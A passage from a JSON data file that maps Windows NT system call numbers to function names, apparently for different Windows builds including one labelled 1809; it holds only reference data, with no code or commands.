\"33\": \"NtQueryInformationToken\", \"34\": \"NtRequestWaitReplyPort\", \"35\": \"NtQueryVirtualMemory\", \"36\": \"NtOpenThreadToken\", \"37\": \"NtQueryInformationThread\", \"38\": \"NtOpenProcess\", \"39\": \"NtSetInformationFile\", \"40\": \"NtMapViewOfSection\", \"41\": \"NtAccessCheckAndAuditAlarm\", \"42\": \"NtUnmapViewOfSection\", \"43\": \"NtReplyWaitReceivePortEx\", \"44\": \"NtTerminateProcess\", \"45\": \"NtSetEventBoostPriority\", \"46\": \"NtReadFileScatter\", \"47\": \"NtOpenThreadTokenEx\", \"48\": \"NtOpenProcessTokenEx\", \"49\": \"NtQueryPerformanceCounter\", \"50\": \"NtEnumerateKey\", \"51\": \"NtOpenFile\", \"52\": \"NtDelayExecution\", \"53\": \"NtQueryDirectoryFile\", \"54\": \"NtQuerySystemInformation\", \"55\": \"NtOpenSection\", \"56\": \"NtQueryTimer\", \"57\": \"NtFsControlFile\", \"58\": \"NtWriteVirtualMemory\", \"59\": \"NtCloseObjectAuditAlarm\", \"60\": \"NtDuplicateObject\", \"61\": \"NtQueryAttributesFile\", \"62\": \"NtClearEvent\", \"63\": \"NtReadVirtualMemory\", \"64\": \"NtOpenEvent\", \"65\": \"NtAdjustPrivilegesToken\", \"66\": \"NtDuplicateToken\", \"67\": \"NtContinue\", \"68\": \"NtQueryDefaultUILanguage\", \"69\": \"NtQueueApcThread\", \"70\": \"NtYieldExecution\", \"71\": \"NtAddAtom\", \"72\": \"NtCreateEvent\", \"73\": \"NtQueryVolumeInformationFile\", \"74\": \"NtCreateSection\", \"75\": \"NtFlushBuffersFile\", \"76\": \"NtApphelpCacheControl\", \"77\": \"NtCreateProcessEx\", \"78\": \"NtCreateThread\", \"79\": \"NtIsProcessInJob\", \"80\": \"NtProtectVirtualMemory\", \"81\": \"NtQuerySection\", \"82\": \"NtResumeThread\", \"83\": \"NtTerminateThread\", \"84\": \"NtReadRequestData\", \"85\": \"NtCreateFile\", \"86\": \"NtQueryEvent\", \"87\": \"NtWriteRequestData\", \"88\": \"NtOpenDirectoryObject\", \"89\": \"NtAccessCheckByTypeAndAuditAlarm\", \"90\": \"NtQuerySystemTime\", \"91\": \"NtWaitForMultipleObjects\", \"92\": \"NtSetInformationObject\", \"93\": \"NtCancelIoFile\", \"94\": \"NtTraceEvent\", \"95\": \"NtPowerInformation\", \"96\": \"NtSetValueKey\", \"97\": \"NtCancelTimer\", \"98\": \"NtSetTimer\", \"99\": \"NtAccessCheckByType\", \"100\": \"NtAccessCheckByTypeResultList\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"102\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"103\": \"NtAcquireProcessActivityReference\", \"104\": \"NtAddAtomEx\", \"105\": \"NtAddBootEntry\", \"106\": \"NtAddDriverEntry\", \"107\": \"NtAdjustGroupsToken\", \"108\": \"NtAdjustTokenClaimsAndDeviceGroups\", \"109\": \"NtAlertResumeThread\", \"110\": \"NtAlertThread\", \"111\": \"NtAlertThreadByThreadId\", \"112\": \"NtAllocateLocallyUniqueId\", \"113\": \"NtAllocateReserveObject\", \"114\": \"NtAllocateUserPhysicalPages\", \"115\": \"NtAllocateUuids\", \"116\": \"NtAllocateVirtualMemoryEx\", \"117\": \"NtAlpcAcceptConnectPort\", \"118\": \"NtAlpcCancelMessage\", \"119\": \"NtAlpcConnectPort\", \"120\": \"NtAlpcConnectPortEx\", \"121\": \"NtAlpcCreatePort\", \"122\": \"NtAlpcCreatePortSection\", \"123\": \"NtAlpcCreateResourceReserve\", \"124\": \"NtAlpcCreateSectionView\", \"125\": \"NtAlpcCreateSecurityContext\", \"126\": \"NtAlpcDeletePortSection\", \"127\": \"NtAlpcDeleteResourceReserve\", \"128\": \"NtAlpcDeleteSectionView\", \"129\": \"NtAlpcDeleteSecurityContext\", \"130\": \"NtAlpcDisconnectPort\", \"131\": \"NtAlpcImpersonateClientContainerOfPort\", \"132\": \"NtAlpcImpersonateClientOfPort\", \"133\": \"NtAlpcOpenSenderProcess\", \"134\": \"NtAlpcOpenSenderThread\", \"135\": \"NtAlpcQueryInformation\", \"136\": \"NtAlpcQueryInformationMessage\", \"137\": \"NtAlpcRevokeSecurityContext\", \"138\": \"NtAlpcSendWaitReceivePort\", \"139\": \"NtAlpcSetInformation\", \"140\": \"NtAreMappedFilesTheSame\", \"141\": \"NtAssignProcessToJobObject\", \"142\": \"NtAssociateWaitCompletionPacket\", \"143\": \"NtCallEnclave\", \"144\": \"NtCancelIoFileEx\", \"145\": \"NtCancelSynchronousIoFile\", \"146\": \"NtCancelTimer2\", \"147\": \"NtCancelWaitCompletionPacket\", \"148\": \"NtCommitComplete\", \"149\": \"NtCommitEnlistment\", \"150\": \"NtCommitRegistryTransaction\", \"151\": \"NtCommitTransaction\", \"152\": \"NtCompactKeys\", \"153\": \"NtCompareObjects\", \"154\": \"NtCompareSigningLevels\", \"155\": \"NtCompareTokens\", \"156\": \"NtCompleteConnectPort\", \"157\": \"NtCompressKey\", \"158\": \"NtConnectPort\", \"159\": \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\", \"160\": \"NtCreateDebugObject\", \"161\": \"NtCreateDirectoryObject\", \"162\": \"NtCreateDirectoryObjectEx\", \"163\": \"NtCreateEnclave\", \"164\": \"NtCreateEnlistment\", \"165\": \"NtCreateEventPair\", \"166\": \"NtCreateIRTimer\", \"167\": \"NtCreateIoCompletion\", \"168\": \"NtCreateJobObject\", \"169\": \"NtCreateJobSet\", \"170\": \"NtCreateKeyTransacted\", \"171\": \"NtCreateKeyedEvent\", \"172\": \"NtCreateLowBoxToken\", \"173\": \"NtCreateMailslotFile\", \"174\": \"NtCreateMutant\", \"175\": \"NtCreateNamedPipeFile\", \"176\": \"NtCreatePagingFile\", \"177\": \"NtCreatePartition\", \"178\": \"NtCreatePort\", \"179\": \"NtCreatePrivateNamespace\", \"180\": \"NtCreateProcess\", \"181\": \"NtCreateProfile\", \"182\": \"NtCreateProfileEx\", \"183\": \"NtCreateRegistryTransaction\", \"184\": \"NtCreateResourceManager\", \"185\": \"NtCreateSemaphore\", \"186\": \"NtCreateSymbolicLinkObject\", \"187\": \"NtCreateThreadEx\", \"188\": \"NtCreateTimer\", \"189\": \"NtCreateTimer2\", \"190\": \"NtCreateToken\", \"191\": \"NtCreateTokenEx\", \"192\": \"NtCreateTransaction\", \"193\": \"NtCreateTransactionManager\", \"194\": \"NtCreateUserProcess\", \"195\": \"NtCreateWaitCompletionPacket\", \"196\": \"NtCreateWaitablePort\", \"197\": \"NtCreateWnfStateName\", \"198\": \"NtCreateWorkerFactory\", \"199\": \"NtDebugActiveProcess\", \"200\": \"NtDebugContinue\", \"201\": \"NtDeleteAtom\", \"202\": \"NtDeleteBootEntry\", \"203\": \"NtDeleteDriverEntry\", \"204\": \"NtDeleteFile\", \"205\": \"NtDeleteKey\", \"206\": \"NtDeleteObjectAuditAlarm\", \"207\": \"NtDeletePrivateNamespace\", \"208\": \"NtDeleteValueKey\", \"209\": \"NtDeleteWnfStateData\", \"210\": \"NtDeleteWnfStateName\", \"211\": \"NtDisableLastKnownGood\", \"212\": \"NtDisplayString\", \"213\": \"NtDrawText\", \"214\": \"NtEnableLastKnownGood\", \"215\": \"NtEnumerateBootEntries\", \"216\": \"NtEnumerateDriverEntries\", \"217\": \"NtEnumerateSystemEnvironmentValuesEx\", \"218\": \"NtEnumerateTransactionObject\", \"219\": \"NtExtendSection\", \"220\": \"NtFilterBootOption\", \"221\": \"NtFilterToken\", \"222\": \"NtFilterTokenEx\", \"223\": \"NtFlushBuffersFileEx\", \"224\": \"NtFlushInstallUILanguage\", \"225\": \"NtFlushInstructionCache\", \"226\": \"NtFlushKey\", \"227\": \"NtFlushProcessWriteBuffers\", \"228\": \"NtFlushVirtualMemory\", \"229\": \"NtFlushWriteBuffer\", \"230\": \"NtFreeUserPhysicalPages\", \"231\": \"NtFreezeRegistry\", \"232\": \"NtFreezeTransactions\", \"233\": \"NtGetCachedSigningLevel\", \"234\": \"NtGetCompleteWnfStateSubscription\", \"235\": \"NtGetContextThread\", \"236\": \"NtGetCurrentProcessorNumber\", \"237\": \"NtGetCurrentProcessorNumberEx\", \"238\": \"NtGetDevicePowerState\", \"239\": \"NtGetMUIRegistryInfo\", \"240\": \"NtGetNextProcess\", \"241\": \"NtGetNextThread\", \"242\": \"NtGetNlsSectionPtr\", \"243\": \"NtGetNotificationResourceManager\", \"244\": \"NtGetWriteWatch\", \"245\": \"NtImpersonateAnonymousToken\", \"246\": \"NtImpersonateThread\", \"247\": \"NtInitializeEnclave\", \"248\": \"NtInitializeNlsFiles\", \"249\": \"NtInitializeRegistry\", \"250\": \"NtInitiatePowerAction\", \"251\": \"NtIsSystemResumeAutomatic\", \"252\": \"NtIsUILanguageComitted\", \"253\": \"NtListenPort\", \"254\": \"NtLoadDriver\", \"255\": \"NtLoadEnclaveData\", \"256\": \"NtLoadHotPatch\", \"257\": \"NtLoadKey\", \"258\": \"NtLoadKey2\", \"259\": \"NtLoadKeyEx\", \"260\": \"NtLockFile\", \"261\": \"NtLockProductActivationKeys\", \"262\": \"NtLockRegistryKey\", \"263\": \"NtLockVirtualMemory\", \"264\": \"NtMakePermanentObject\", \"265\": \"NtMakeTemporaryObject\", \"266\": \"NtManagePartition\", \"267\": \"NtMapCMFModule\", \"268\": \"NtMapUserPhysicalPages\", \"269\": \"NtMapViewOfSectionEx\", \"270\": \"NtModifyBootEntry\", \"271\": \"NtModifyDriverEntry\", \"272\": \"NtNotifyChangeDirectoryFile\", \"273\": \"NtNotifyChangeDirectoryFileEx\", \"274\": \"NtNotifyChangeKey\", \"275\": \"NtNotifyChangeMultipleKeys\", \"276\": \"NtNotifyChangeSession\", \"277\": \"NtOpenEnlistment\", \"278\": \"NtOpenEventPair\", \"279\": \"NtOpenIoCompletion\", \"280\": \"NtOpenJobObject\", \"281\": \"NtOpenKeyEx\", \"282\": \"NtOpenKeyTransacted\", \"283\": \"NtOpenKeyTransactedEx\", \"284\": \"NtOpenKeyedEvent\", \"285\": \"NtOpenMutant\", \"286\": \"NtOpenObjectAuditAlarm\", \"287\": \"NtOpenPartition\", \"288\": \"NtOpenPrivateNamespace\", \"289\": \"NtOpenProcessToken\", \"290\": \"NtOpenRegistryTransaction\", \"291\": \"NtOpenResourceManager\", \"292\": \"NtOpenSemaphore\", \"293\": \"NtOpenSession\", \"294\": \"NtOpenSymbolicLinkObject\", \"295\": \"NtOpenThread\", \"296\": \"NtOpenTimer\", \"297\": \"NtOpenTransaction\", \"298\": \"NtOpenTransactionManager\", \"299\": \"NtPlugPlayControl\", \"300\": \"NtPrePrepareComplete\", \"301\": \"NtPrePrepareEnlistment\", \"302\": \"NtPrepareComplete\", \"303\": \"NtPrepareEnlistment\", \"304\": \"NtPrivilegeCheck\", \"305\": \"NtPrivilegeObjectAuditAlarm\", \"306\": \"NtPrivilegedServiceAuditAlarm\", \"307\": \"NtPropagationComplete\", \"308\": \"NtPropagationFailed\", \"309\": \"NtPulseEvent\", \"310\": \"NtQueryAuxiliaryCounterFrequency\", \"311\": \"NtQueryBootEntryOrder\", \"312\": \"NtQueryBootOptions\", \"313\": \"NtQueryDebugFilterState\", \"314\": \"NtQueryDirectoryFileEx\", \"315\": \"NtQueryDirectoryObject\", \"316\": \"NtQueryDriverEntryOrder\", \"317\": \"NtQueryEaFile\", \"318\": \"NtQueryFullAttributesFile\", \"319\": \"NtQueryInformationAtom\", \"320\": \"NtQueryInformationByName\", \"321\": \"NtQueryInformationEnlistment\", \"322\": \"NtQueryInformationJobObject\", \"323\": \"NtQueryInformationPort\", \"324\": \"NtQueryInformationResourceManager\", \"325\": \"NtQueryInformationTransaction\", \"326\": \"NtQueryInformationTransactionManager\", \"327\": \"NtQueryInformationWorkerFactory\", \"328\": \"NtQueryInstallUILanguage\", \"329\": \"NtQueryIntervalProfile\", \"330\": \"NtQueryIoCompletion\", \"331\": \"NtQueryLicenseValue\", \"332\": \"NtQueryMultipleValueKey\", \"333\": \"NtQueryMutant\", \"334\": \"NtQueryOpenSubKeys\", \"335\": \"NtQueryOpenSubKeysEx\", \"336\": \"NtQueryPortInformationProcess\", \"337\": \"NtQueryQuotaInformationFile\", \"338\": \"NtQuerySecurityAttributesToken\", \"339\": \"NtQuerySecurityObject\", \"340\": \"NtQuerySecurityPolicy\", \"341\": \"NtQuerySemaphore\", \"342\": \"NtQuerySymbolicLinkObject\", \"343\": \"NtQuerySystemEnvironmentValue\", \"344\": \"NtQuerySystemEnvironmentValueEx\", \"345\": \"NtQuerySystemInformationEx\", \"346\": \"NtQueryTimerResolution\", \"347\": \"NtQueryWnfStateData\", \"348\": \"NtQueryWnfStateNameInformation\", \"349\": \"NtQueueApcThreadEx\", \"350\": \"NtRaiseException\", \"351\": \"NtRaiseHardError\", \"352\": \"NtReadOnlyEnlistment\", \"353\": \"NtRecoverEnlistment\", \"354\": \"NtRecoverResourceManager\", \"355\": \"NtRecoverTransactionManager\", \"356\": \"NtRegisterProtocolAddressInformation\", \"357\": \"NtRegisterThreadTerminatePort\", \"358\": \"NtReleaseKeyedEvent\", \"359\": \"NtReleaseWorkerFactoryWorker\", \"360\": \"NtRemoveIoCompletionEx\", \"361\": \"NtRemoveProcessDebug\", \"362\": \"NtRenameKey\", \"363\": \"NtRenameTransactionManager\", \"364\": \"NtReplaceKey\", \"365\": \"NtReplacePartitionUnit\", \"366\": \"NtReplyWaitReplyPort\", \"367\": \"NtRequestPort\", \"368\": \"NtResetEvent\", \"369\": \"NtResetWriteWatch\", \"370\": \"NtRestoreKey\", \"371\": \"NtResumeProcess\", \"372\": \"NtRevertContainerImpersonation\", \"373\": \"NtRollbackComplete\", \"374\": \"NtRollbackEnlistment\", \"375\": \"NtRollbackRegistryTransaction\", \"376\": \"NtRollbackTransaction\", \"377\": \"NtRollforwardTransactionManager\", \"378\": \"NtSaveKey\", \"379\": \"NtSaveKeyEx\", \"380\": \"NtSaveMergedKeys\", \"381\": \"NtSecureConnectPort\", \"382\": \"NtSerializeBoot\", \"383\": \"NtSetBootEntryOrder\", \"384\": \"NtSetBootOptions\", \"385\": \"NtSetCachedSigningLevel\", \"386\": \"NtSetCachedSigningLevel2\", \"387\": \"NtSetContextThread\", \"388\": \"NtSetDebugFilterState\", \"389\": \"NtSetDefaultHardErrorPort\", \"390\": \"NtSetDefaultLocale\", \"391\": \"NtSetDefaultUILanguage\", \"392\": \"NtSetDriverEntryOrder\", \"393\": \"NtSetEaFile\", \"394\": \"NtSetHighEventPair\", \"395\": \"NtSetHighWaitLowEventPair\", \"396\": \"NtSetIRTimer\", \"397\": \"NtSetInformationDebugObject\", \"398\": \"NtSetInformationEnlistment\", \"399\": \"NtSetInformationJobObject\", \"400\": \"NtSetInformationKey\", \"401\": \"NtSetInformationResourceManager\", \"402\": \"NtSetInformationSymbolicLink\", \"403\": \"NtSetInformationToken\", \"404\": \"NtSetInformationTransaction\", \"405\": \"NtSetInformationTransactionManager\", \"406\": \"NtSetInformationVirtualMemory\", \"407\": \"NtSetInformationWorkerFactory\", \"408\": \"NtSetIntervalProfile\", \"409\": \"NtSetIoCompletion\", \"410\": \"NtSetIoCompletionEx\", \"411\": \"NtSetLdtEntries\", \"412\": \"NtSetLowEventPair\", \"413\": \"NtSetLowWaitHighEventPair\", \"414\": \"NtSetQuotaInformationFile\", \"415\": \"NtSetSecurityObject\", \"416\": \"NtSetSystemEnvironmentValue\", \"417\": \"NtSetSystemEnvironmentValueEx\", \"418\": \"NtSetSystemInformation\", \"419\": \"NtSetSystemPowerState\", \"420\": \"NtSetSystemTime\", \"421\": \"NtSetThreadExecutionState\", \"422\": \"NtSetTimer2\", \"423\": \"NtSetTimerEx\", \"424\": \"NtSetTimerResolution\", \"425\": \"NtSetUuidSeed\", \"426\": \"NtSetVolumeInformationFile\", \"427\": \"NtSetWnfProcessNotificationEvent\", \"428\": \"NtShutdownSystem\", \"429\": \"NtShutdownWorkerFactory\", \"430\": \"NtSignalAndWaitForSingleObject\", \"431\": \"NtSinglePhaseReject\", \"432\": \"NtStartProfile\", \"433\": \"NtStopProfile\", \"434\": \"NtSubscribeWnfStateChange\", \"435\": \"NtSuspendProcess\", \"436\": \"NtSuspendThread\", \"437\": \"NtSystemDebugControl\", \"438\": \"NtTerminateEnclave\", \"439\": \"NtTerminateJobObject\", \"440\": \"NtTestAlert\", \"441\": \"NtThawRegistry\", \"442\": \"NtThawTransactions\", \"443\": \"NtTraceControl\", \"444\": \"NtTranslateFilePath\", \"445\": \"NtUmsThreadYield\", \"446\": \"NtUnloadDriver\", \"447\": \"NtUnloadKey\", \"448\": \"NtUnloadKey2\", \"449\": \"NtUnloadKeyEx\", \"450\": \"NtUnlockFile\", \"451\": \"NtUnlockVirtualMemory\", \"452\": \"NtUnmapViewOfSectionEx\", \"453\": \"NtUnsubscribeWnfStateChange\", \"454\": \"NtUpdateWnfStateData\", \"455\": \"NtVdmControl\", \"456\": \"NtWaitForAlertByThreadId\", \"457\": \"NtWaitForDebugEvent\", \"458\": \"NtWaitForKeyedEvent\", \"459\": \"NtWaitForWorkViaWorkerFactory\", \"460\": \"NtWaitHighEventPair\", \"461\": \"NtWaitLowEventPair\"}, \"1809\": {\"0\": \"NtAccessCheck\", \"1\": \"NtWorkerFactoryWorkerReady\", \"2\": \"NtAcceptConnectPort\", \"3\": \"NtMapUserPhysicalPagesScatter\", \"4\": \"NtWaitForSingleObject\", \"5\": \"NtCallbackReturn\", \"6\": \"NtReadFile\", \"7\": \"NtDeviceIoControlFile\", \"8\": \"NtWriteFile\", \"9\": \"NtRemoveIoCompletion\", \"10\": \"NtReleaseSemaphore\", \"11\": \"NtReplyWaitReceivePort\", \"12\": \"NtReplyPort\", \"13\": \"NtSetInformationThread\", \"14\": \"NtSetEvent\", \"15\": \"NtClose\", \"16\": \"NtQueryObject\", \"17\": \"NtQueryInformationFile\", \"18\": \"NtOpenKey\", \"19\": \"NtEnumerateValueKey\", \"20\": \"NtFindAtom\", \"21\": \"NtQueryDefaultLocale\", \"22\": \"NtQueryKey\", \"23\": \"NtQueryValueKey\", \"24\": \"NtAllocateVirtualMemory\", \"25\": \"NtQueryInformationProcess\", \"26\": \"NtWaitForMultipleObjects32\", \"27\": \"NtWriteFileGather\", \"28\": \"NtSetInformationProcess\", \"29\": \"NtCreateKey\", \"30\": \"NtFreeVirtualMemory\", \"31\": \"NtImpersonateClientOfPort\", \"32\": \"NtReleaseMutant\", \"33\": \"NtQueryInformationToken\", \"34\": \"NtRequestWaitReplyPort\", \"35\": \"NtQueryVirtualMemory\", \"36\": \"NtOpenThreadToken\", \"37\": \"NtQueryInformationThread\", \"38\": \"NtOpenProcess\", \"39\": \"NtSetInformationFile\", \"40\": \"NtMapViewOfSection\", \"41\": \"NtAccessCheckAndAuditAlarm\", \"42\": \"NtUnmapViewOfSection\", \"43\": \"NtReplyWaitReceivePortEx\", \"44\": \"NtTerminateProcess\", \"45\": \"NtSetEventBoostPriority\", \"46\": \"NtReadFileScatter\", \"47\": \"NtOpenThreadTokenEx\", \"48\": \"NtOpenProcessTokenEx\", \"49\": \"NtQueryPerformanceCounter\", \"50\": \"NtEnumerateKey\", \"51\": \"NtOpenFile\", \"52\": \"NtDelayExecution\", \"53\": \"NtQueryDirectoryFile\", \"54\": \"NtQuerySystemInformation\", \"55\": \"NtOpenSection\", \"56\": \"NtQueryTimer\", \"57\": \"NtFsControlFile\", \"58\": \"NtWriteVirtualMemory\", \"59\": \"NtCloseObjectAuditAlarm\", \"60\": \"NtDuplicateObject\", \"61\": \"NtQueryAttributesFile\", \"62\": \"NtClearEvent\", \"63\": \"NtReadVirtualMemory\", \"64\": \"NtOpenEvent\", \"65\": \"NtAdjustPrivilegesToken\", \"66\": \"NtDuplicateToken\", \"67\": \"NtContinue\", \"68\": \"NtQueryDefaultUILanguage\", \"69\": \"NtQueueApcThread\", \"70\": \"NtYieldExecution\", \"71\": \"NtAddAtom\", \"72\": \"NtCreateEvent\", \"73\": \"NtQueryVolumeInformationFile\", \"74\": \"NtCreateSection\", \"75\": \"NtFlushBuffersFile\", \"76\": \"NtApphelpCacheControl\", \"77\": \"NtCreateProcessEx\", \"78\": \"NtCreateThread\", \"79\": \"NtIsProcessInJob\", \"80\": \"NtProtectVirtualMemory\", \"81\": \"NtQuerySection\", \"82\": \"NtResumeThread\", \"83\": \"NtTerminateThread\", \"84\": \"NtReadRequestData\", \"85\": \"NtCreateFile\", \"86\": \"NtQueryEvent\", \"87\": \"NtWriteRequestData\", \"88\": \"NtOpenDirectoryObject\", \"89\": \"NtAccessCheckByTypeAndAuditAlarm\", \"90\": \"NtQuerySystemTime\", \"91\": \"NtWaitForMultipleObjects\", \"92\": \"NtSetInformationObject\", \"93\": \"NtCancelIoFile\", \"94\": \"NtTraceEvent\", \"95\": \"NtPowerInformation\", \"96\": \"NtSetValueKey\", \"97\": \"NtCancelTimer\", \"98\": \"NtSetTimer\", \"99\": \"NtAccessCheckByType\", \"100\": \"NtAccessCheckByTypeResultList\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"102\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"103\": \"NtAcquireProcessActivityReference\", \"104\": \"NtAddAtomEx\", \"105\": \"NtAddBootEntry\", \"106\": \"NtAddDriverEntry\", \"107\": \"NtAdjustGroupsToken\", \"108\": \"NtAdjustTokenClaimsAndDeviceGroups\", \"109\": \"NtAlertResumeThread\", \"110\": \"NtAlertThread\", \"111\": \"NtAlertThreadByThreadId\", \"112\": \"NtAllocateLocallyUniqueId\", \"113\": \"NtAllocateReserveObject\", \"114\": \"NtAllocateUserPhysicalPages\", \"115\": \"NtAllocateUuids\", \"116\": \"NtAllocateVirtualMemoryEx\", \"117\": \"NtAlpcAcceptConnectPort\", \"118\": \"NtAlpcCancelMessage\", \"119\": \"NtAlpcConnectPort\", \"120\": \"NtAlpcConnectPortEx\", \"121\": \"NtAlpcCreatePort\", \"122\": \"NtAlpcCreatePortSection\", \"123\": \"NtAlpcCreateResourceReserve\", \"124\": \"NtAlpcCreateSectionView\", \"125\": \"NtAlpcCreateSecurityContext\", \"126\": \"NtAlpcDeletePortSection\", \"127\": \"NtAlpcDeleteResourceReserve\", \"128\": \"NtAlpcDeleteSectionView\", \"129\": \"NtAlpcDeleteSecurityContext\", \"130\": \"NtAlpcDisconnectPort\", \"131\": \"NtAlpcImpersonateClientContainerOfPort\", \"132\": \"NtAlpcImpersonateClientOfPort\", \"133\": \"NtAlpcOpenSenderProcess\", \"134\": \"NtAlpcOpenSenderThread\", \"135\": \"NtAlpcQueryInformation\", \"136\": \"NtAlpcQueryInformationMessage\", \"137\": \"NtAlpcRevokeSecurityContext\", \"138\": \"NtAlpcSendWaitReceivePort\", \"139\": \"NtAlpcSetInformation\", \"140\": \"NtAreMappedFilesTheSame\", \"141\": \"NtAssignProcessToJobObject\", \"142\": \"NtAssociateWaitCompletionPacket\", \"143\": \"NtCallEnclave\", \"144\": \"NtCancelIoFileEx\", \"145\": \"NtCancelSynchronousIoFile\", \"146\": \"NtCancelTimer2\", \"147\": \"NtCancelWaitCompletionPacket\", \"148\": \"NtCommitComplete\", \"149\": \"NtCommitEnlistment\", \"150\": \"NtCommitRegistryTransaction\", \"151\": \"NtCommitTransaction\", \"152\": \"NtCompactKeys\", \"153\": \"NtCompareObjects\", \"154\": \"NtCompareSigningLevels\", \"155\": \"NtCompareTokens\", \"156\": \"NtCompleteConnectPort\", \"157\": \"NtCompressKey\", \"158\": \"NtConnectPort\", \"159\": \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\", \"160\": \"NtCreateDebugObject\", \"161\": \"NtCreateDirectoryObject\", \"162\": \"NtCreateDirectoryObjectEx\", \"163\": \"NtCreateEnclave\", \"164\": \"NtCreateEnlistment\", \"165\": \"NtCreateEventPair\", \"166\": \"NtCreateIRTimer\", \"167\": \"NtCreateIoCompletion\", \"168\": \"NtCreateJobObject\", \"169\": \"NtCreateJobSet\", \"170\": \"NtCreateKeyTransacted\", \"171\": \"NtCreateKeyedEvent\", \"172\": \"NtCreateLowBoxToken\", \"173\": \"NtCreateMailslotFile\", \"174\": \"NtCreateMutant\", \"175\": \"NtCreateNamedPipeFile\", \"176\": \"NtCreatePagingFile\", \"177\": \"NtCreatePartition\", \"178\": \"NtCreatePort\", \"179\": \"NtCreatePrivateNamespace\", \"180\": \"NtCreateProcess\", \"181\": \"NtCreateProfile\", \"182\": \"NtCreateProfileEx\", \"183\": \"NtCreateRegistryTransaction\", \"184\": \"NtCreateResourceManager\", \"185\": \"NtCreateSectionEx\", \"186\": \"NtCreateSemaphore\", \"187\": \"NtCreateSymbolicLinkObject\", \"188\": \"NtCreateThreadEx\", \"189\": \"NtCreateTimer\", \"190\": \"NtCreateTimer2\", \"191\": \"NtCreateToken\", \"192\": \"NtCreateTokenEx\", \"193\": \"NtCreateTransaction\", \"194\": \"NtCreateTransactionManager\", \"195\": \"NtCreateUserProcess\", \"196\": \"NtCreateWaitCompletionPacket\", \"197\": \"NtCreateWaitablePort\", \"198\": \"NtCreateWnfStateName\", \"199\": \"NtCreateWorkerFactory\", \"200\": \"NtDebugActiveProcess\", \"201\": \"NtDebugContinue\", \"202\": \"NtDeleteAtom\", \"203\": \"NtDeleteBootEntry\", \"204\": \"NtDeleteDriverEntry\", \"205\": \"NtDeleteFile\", \"206\": \"NtDeleteKey\", \"207\": \"NtDeleteObjectAuditAlarm\", \"208\": \"NtDeletePrivateNamespace\", \"209\": \"NtDeleteValueKey\", \"210\": \"NtDeleteWnfStateData\", \"211\": \"NtDeleteWnfStateName\", \"212\": \"NtDisableLastKnownGood\", \"213\": \"NtDisplayString\", \"214\": \"NtDrawText\", \"215\": \"NtEnableLastKnownGood\", \"216\": \"NtEnumerateBootEntries\", \"217\": \"NtEnumerateDriverEntries\", \"218\": \"NtEnumerateSystemEnvironmentValuesEx\", \"219\": \"NtEnumerateTransactionObject\", \"220\": \"NtExtendSection\", \"221\": \"NtFilterBootOption\", \"222\": \"NtFilterToken\", \"223\": \"NtFilterTokenEx\", \"224\": \"NtFlushBuffersFileEx\", \"225\": \"NtFlushInstallUILanguage\", \"226\": \"NtFlushInstructionCache\", \"227\": \"NtFlushKey\", \"228\": \"NtFlushProcessWriteBuffers\", \"229\": \"NtFlushVirtualMemory\", \"230\": \"NtFlushWriteBuffer\", \"231\": \"NtFreeUserPhysicalPages\", \"232\": \"NtFreezeRegistry\", \"233\": \"NtFreezeTransactions\", \"234\": \"NtGetCachedSigningLevel\", \"235\": \"NtGetCompleteWnfStateSubscription\", \"236\": \"NtGetContextThread\", \"237\": \"NtGetCurrentProcessorNumber\", \"238\": \"NtGetCurrentProcessorNumberEx\", \"239\": \"NtGetDevicePowerState\", \"240\": \"NtGetMUIRegistryInfo\", \"241\": \"NtGetNextProcess\", \"242\": \"NtGetNextThread\", \"243\": \"NtGetNlsSectionPtr\", \"244\": \"NtGetNotificationResourceManager\", \"245\": \"NtGetWriteWatch\", \"246\": \"NtImpersonateAnonymousToken\", \"247\": \"NtImpersonateThread\", \"248\": \"NtInitializeEnclave\", \"249\": \"NtInitializeNlsFiles\", \"250\": \"NtInitializeRegistry\", \"251\": \"NtInitiatePowerAction\", \"252\": \"NtIsSystemResumeAutomatic\", \"253\": \"NtIsUILanguageComitted\", \"254\": \"NtListenPort\", \"255\": \"NtLoadDriver\", \"256\": \"NtLoadEnclaveData\", \"257\": \"NtLoadKey\", \"258\": \"NtLoadKey2\", \"259\": \"NtLoadKeyEx\", \"260\": \"NtLockFile\", \"261\": \"NtLockProductActivationKeys\", \"262\": \"NtLockRegistryKey\", \"263\": \"NtLockVirtualMemory\", \"264\": \"NtMakePermanentObject\", \"265\": \"NtMakeTemporaryObject\", \"266\": \"NtManageHotPatch\", \"267\": \"NtManagePartition\", \"268\": \"NtMapCMFModule\", \"269\": \"NtMapUserPhysicalPages\", \"270\": \"NtMapViewOfSectionEx\", \"271\": \"NtModifyBootEntry\", \"272\": \"NtModifyDriverEntry\", \"273\": \"NtNotifyChangeDirectoryFile\", \"274\": \"NtNotifyChangeDirectoryFileEx\", \"275\": \"NtNotifyChangeKey\", \"276\": \"NtNotifyChangeMultipleKeys\", \"277\": \"NtNotifyChangeSession\", \"278\": \"NtOpenEnlistment\", \"279\": \"NtOpenEventPair\", \"280\": \"NtOpenIoCompletion\", \"281\": \"NtOpenJobObject\", \"282\": \"NtOpenKeyEx\", \"283\": \"NtOpenKeyTransacted\", \"284\": \"NtOpenKeyTransactedEx\", \"285\": \"NtOpenKeyedEvent\", \"286\": \"NtOpenMutant\", \"287\": \"NtOpenObjectAuditAlarm\", \"288\": \"NtOpenPartition\", \"289\": \"NtOpenPrivateNamespace\", \"290\": \"NtOpenProcessToken\", \"291\": \"NtOpenRegistryTransaction\", \"292\": \"NtOpenResourceManager\", \"293\": \"NtOpenSemaphore\", \"294\": \"NtOpenSession\", \"295\": \"NtOpenSymbolicLinkObject\", \"296\": \"NtOpenThread\", \"297\": \"NtOpenTimer\", \"298\": \"NtOpenTransaction\", \"299\": \"NtOpenTransactionManager\", \"300\": \"NtPlugPlayControl\", \"301\": \"NtPrePrepareComplete\", \"302\": \"NtPrePrepareEnlistment\", \"303\": \"NtPrepareComplete\", \"304\": \"NtPrepareEnlistment\", \"305\": \"NtPrivilegeCheck\", \"306\": \"NtPrivilegeObjectAuditAlarm\", \"307\": \"NtPrivilegedServiceAuditAlarm\", \"308\": \"NtPropagationComplete\", \"309\": \"NtPropagationFailed\", \"310\": \"NtPulseEvent\", \"311\": \"NtQueryAuxiliaryCounterFrequency\", \"312\": 